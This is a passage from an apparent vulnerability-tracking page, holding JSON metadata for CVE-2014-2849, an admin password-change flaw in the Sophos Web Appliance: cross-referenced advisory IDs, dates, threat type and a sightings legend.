"url": "https://github.com/rapid7/metasploit-framework"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "VULHUB",
"id": "VHN-70788"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
},
{
"db": "NVD",
"id": "CVE-2014-2849"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "ZDI",
"id": "ZDI-14-069",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-70788",
"ident": null
},
{
"db": "BID",
"id": "66734",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "126099",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2014-2849",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2014-04-08T00:00:00",
"db": "ZDI",
"id": "ZDI-14-069",
"ident": null
},
{
"date": "2014-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-70788",
"ident": null
},
{
"date": "2014-04-08T00:00:00",
"db": "BID",
"id": "66734",
"ident": null
},
{
"date": "2014-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002000",
"ident": null
},
{
"date": "2014-04-09T23:53:40",
"db": "PACKETSTORM",
"id": "126099",
"ident": null
},
{
"date": "2014-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-157",
"ident": null
},
{
"date": "2014-04-11T15:55:27.660000",
"db": "NVD",
"id": "CVE-2014-2849",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2014-04-08T00:00:00",
"db": "ZDI",
"id": "ZDI-14-069",
"ident": null
},
{
"date": "2014-04-14T00:00:00",
"db": "VULHUB",
"id": "VHN-70788",
"ident": null
},
{
"date": "2014-04-17T01:09:00",
"db": "BID",
"id": "66734",
"ident": null
},
{
"date": "2014-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002000",
"ident": null
},
{
"date": "2014-04-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201404-157",
"ident": null
},
{
"date": "2024-11-21T02:07:03.033000",
"db": "NVD",
"id": "CVE-2014-2849",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Sophos Web Appliance of Change Password Vulnerability to change admin user password in dialog box",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…